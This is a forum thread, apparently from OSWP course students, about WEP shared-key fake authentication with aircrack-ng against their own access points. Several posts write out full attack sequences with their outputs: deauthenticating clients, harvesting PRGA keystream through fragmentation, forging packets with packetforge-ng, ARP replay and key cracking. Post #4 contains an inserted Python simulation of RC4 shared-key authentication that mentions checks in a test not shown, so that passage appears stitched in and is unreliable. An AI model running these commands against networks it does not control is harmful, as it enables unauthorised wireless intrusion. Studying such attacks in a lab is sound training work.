Thread: Aircrack-ng: Fakeauth against WEP-SKA w/ PRGA .xor

  1. #1 - Member (Join Date: Jun 2009, Posts: 74)

    Aircrack-ng: Fakeauth against WEP-SKA w/ PRGA .xor

    Hello,

    I have what I think is a simple question. I am in the middle of taking the OSWP course and have a question about authenticating against a WEP-encrypted network with SKA enabled. For reference:

    $ap = my AP's MAC
    $alfa = my MAC
    $pc = another laptop I have connected to my AP's MAC

    My goal is to fakeauth with my alfa card to my AP by using a PRGA .xor generated via a fragmentation attack. Yes I know there are other ways I can inject (e.g. spoof my other client's MAC as my own after deauthing the other client, etc and fakeauth as that source mac). I don't want to do that because in a real life scenario (i.e. a pentest) it could be noticed and a good attacker probably would try to avoid it. Anyway - that aside, I must be missing something stupid here:

    First I monitor my AP via airodump-ng with:

    Code:
    airodump-ng -c 6 --bssid $ap -w wepviaclient wlan0
    And see the output w/ no problem, my PC connected to it, etc. (I'm posting this from a different computer so I can't copy and paste the output right now and I don't think it's necessary for this cause I know it's correct).

    Then I fragment to generate the .xor file:

    Code:
    aireplay-ng -5 -b $ap -h $alfa -l 255.255.255.255 -k 255.255.255.255 wlan0
    A .xor is generated.

    Then I attempt to fakeauth:

    Code:
    aireplay-ng -1 0 -a $ap -h $alfa -y fragment-0629-233133.xor wlan0
    And I get:

    Code:
    Sending Authentication Request (Shared Key) [ACK]
    Authentication 1/2 successful
    Sending encrypted challenge [ACK]
    Challenge failure
    Over, and over, and over.

    The one thing I don't quite understand is the -l and -k switches when generating the .xor (I assume this is just so the AP will pass the packet through, but some clarification there might be the key). Any ideas what I'm doing wrong? I feel like it's something very simple that I'm missing. In the meantime, turning off SKA or generating ARPs as an auth'd client works fine to increase IVs, and I have already cracked the key several times. I don't know if this is really relevant to the course or not, but I really want to know why this doesn't work.

    Thanks!
    Last edited by ThePistonDoctor; 06-30-2011 at 04:57 AM.
    cd ~
    cd ./fridge
    rm beer
    cd ../bedroom
    more beer

  2. #2 - Junior Member (Join Date: Jun 2011, Location: UK, Posts: 45)

    Re: Aircrack-ng: Fakeauth against WEP-SKA w/ PRGA .xor

    It looks like the AP MAC filter is enabled; your AP won't take your Alfa's fake MAC. You need to change your fake MAC to the MAC that usually connects to the AP.

  3. #3 - Member (Join Date: Jun 2009, Posts: 74)

    Re: Aircrack-ng: Fakeauth against WEP-SKA w/ PRGA .xor

    No MAC filter - it's my AP and I know it's off. If I auth against it w/ open authentication it works fine. It's only when using SKA that I can't associate. I don't really see how the PRGA xor can be used to generate the key - or is it just being used to make it look like I already have the key and sent the association encrypted w/ a valid PRGA?

    Thanks

  4. #4 - Just burned his ISO (Join Date: Jul 2011, Posts: 2)

    Re: Aircrack-ng: Fakeauth against WEP-SKA w/ PRGA .xor

    Hello

    I have the same issue.

    However, I use another method to obtain the xor file.

    First I start by monitoring the network with:

    Code:
    airodump-ng -w $FILE --bssid $BSSID -c $CHANNEL mon0
    I notice that it is a network with WEP and the AUTH field says SKA.

    I deauth one client with:

    Code:
    aireplay-ng -0 1 -a $BSSID -c $CLIENT mon0
    I see that I have a .xor file, and I do:

    Code:
    aireplay-ng -1 0 -e $ESSID -y $FILE.xor -a $BSSID -h $MY_MAC mon0
    However, the reply is:

    Code:
    15:38:03 Sending Authentication Request (Shared Key) [ACK]
    15:38:03 Authentication 1/2 successful
    15:38:03 Sending encrypted challenge. [ACK]
    15:38:03 Challenge failure
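    The question in post #3 (what the PRGA .xor actually stands in for) and the capture procedure in post #4 come down to how WEP shared-key authentication works: the AP sends a clear-text challenge, the client returns it XORed with RC4(IV || key), so anyone who sees both frames learns that IV's keystream and can answer later challenges without the key, which is why SKA is weaker than open authentication. The simulation below is an added example written for this thread, not code from the posts or from aircrack-ng; all function names, the key, IV and challenge bytes are constructed, and the CRC-32 ICV a real frame carries is left out.

```python
from typing import Optional


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4, the cipher WEP uses, seeded with IV || WEP key (constructed inputs only)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def client_response(wep_key: bytes, iv: bytes, challenge: bytes) -> bytes:
    """SKA frame 3: the AP's 128-byte challenge XORed with RC4(IV || key); the IV is sent in clear.
    Simplification: the CRC-32 ICV that a real frame appends is omitted."""
    return xor_bytes(challenge, rc4_keystream(iv + wep_key, len(challenge)))


def ap_verifies(wep_key: bytes, iv: bytes, challenge: bytes, response: bytes) -> bool:
    """SKA frame 4: the AP re-derives the keystream from the IV it was sent and
    accepts only if decryption yields exactly the challenge it issued."""
    if len(response) != len(challenge):
        return False
    return xor_bytes(response, rc4_keystream(iv + wep_key, len(response))) == challenge


def recover_prga(challenge: bytes, response: bytes) -> bytes:
    """Passive observer: frames 2 and 3 of one handshake leak the keystream for that IV.
    This is the PRGA that aireplay-ng writes to a .xor file when it sees an SKA client."""
    return xor_bytes(challenge, response)


def forged_response(prga: bytes, new_challenge: bytes) -> Optional[bytes]:
    """What `aireplay-ng -1 ... -y file.xor` does conceptually: answer a fresh challenge with the
    recovered keystream and reuse its IV. A keystream shorter than the challenge is unusable."""
    if len(prga) < len(new_challenge):
        return None
    return xor_bytes(new_challenge, prga)
```

    The last two checks in the test show the two ways the AP ends up reporting a challenge failure: a keystream that is too short for the challenge, or a keystream that does not belong to the IV (or key) the AP uses to decrypt the response.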

  5. #5 - Just burned his ISO (Join Date: Dec 2010, Posts: 23)

    Re: Aircrack-ng: Fakeauth against WEP-SKA w/ PRGA .xor

    Hi,

    I may be missing the point - it's been a long week (!), but how about the following:

    Capture Output: airodump-ng -c 1 -w ska --bssid [bssid] mon0 (.xor via client connection, deauth, etc)
    Create Packet: packetforge-ng -0 -a [bssid] -h [my client mac] -l 255.255.255.255 -k 255.255.255.255 -y captured.xor -w output.cap
    Fake Auth: aireplay-ng -1 10 -e [essid] -a [BSSID] -h [my client mac] -y output.cap mon0
    Natural Replay: aireplay-ng -2 -r output.cap mon0
    Crack: aircrack-ng output.cap

  6. #6 - Just burned his ISO (Join Date: May 2011, Posts: 3)

    Re: Aircrack-ng: Fakeauth against WEP-SKA w/ PRGA .xor

    Quote Originally Posted by Quartercask:
    Capture Output: airodump-ng -c 1 -w ska --bssid [bssid] mon0 (.xor via client connection, deauth, etc)
    Create Packet: packetforge-ng -0 -a [bssid] -h [my client mac] -l 255.255.255.255 -k 255.255.255.255 -y captured.xor -w output.cap
    Fake Auth: aireplay-ng -1 10 -e [essid] -a [BSSID] -h [my client mac] -y output.cap mon0
    Natural Replay: aireplay-ng -2 -r output.cap mon0
    Crack: aircrack-ng output.cap

    Thanks for helping out Quartercask, I've been having the same problem as ThePistonDoctor and tried your solution. I just get a 108-byte file from packetforge which can't be used for the fakeauth.

    I can happily crack the AP (my home router) if I use open WEP or WPA2 (with the password in the wordlist of course), but as soon as I change to shared key WEP I get the same problem of "Authentication 1/2 successful...Challenge failure" repeated over and over again.

    I've tried changing my MAC to that of the authorised client and I still get the same problem (with and without the client being active).

    I can't find a solution anywhere on the web (though the aircrack-ng forums are down atm) despite searching for a number of hours.

    Anyone find a solution for a total noob like me?

    Cheers,
    Demented

    P.S. AP is a TP-Link TL-WR1043N. Client is an old Dell Inspiron and penetration box is an Asus M51vm running BT5r2 with an Intel WiFi Link 5100 (apt upgrade and dist-upgrade run this morning 3-June-12).

  7. #7 - darcstar, Just burned his ISO (Join Date: Jun 2011, Location: 127.0.0.1, Posts: 10)

    Re: Aircrack-ng: Fakeauth against WEP-SKA w/ PRGA .xor

    Just create an entry in your MAC inclusion list on your router settings to include the faked MAC you want to use for the attack. If you use an Alfa card and then change its MAC, it can no longer associate with ifconfig settings. If you do include the fake MAC in the inclusion list, you can continue to function on the same interface without the issue of inconsistency.
    I have generated a series of inclusions into my AP so I can have a choice depending on the situation, and this will still allow you to connect to your AP after you use macchanger.

  8. #8 - Just burned his ISO (Join Date: Jul 2011, Posts: 1)

    Reference: Re: Aircrack-ng: Fakeauth against WEP-SKA w/ PRGA .xor

    Quote Originally Posted by darcstar:
    Just create an entry in your MAC inclusion list on your router settings to include the faked MAC you want to use for the attack. If you use an Alfa card and then change its MAC, it can no longer associate with ifconfig settings. If you do include the fake MAC in the inclusion list, you can continue to function on the same interface without the issue of inconsistency.
    I have generated a series of inclusions into my AP so I can have a choice depending on the situation, and this will still allow you to connect to your AP after you use macchanger.

    A key that is completely random (maximum entropy) without any pattern, using any random alpha-numeric characters (a-z, A-Z, 0-9)...62 possible characters.
    WPA-PSK TKIP (RC4)
    I am curious how many centuries it would take!
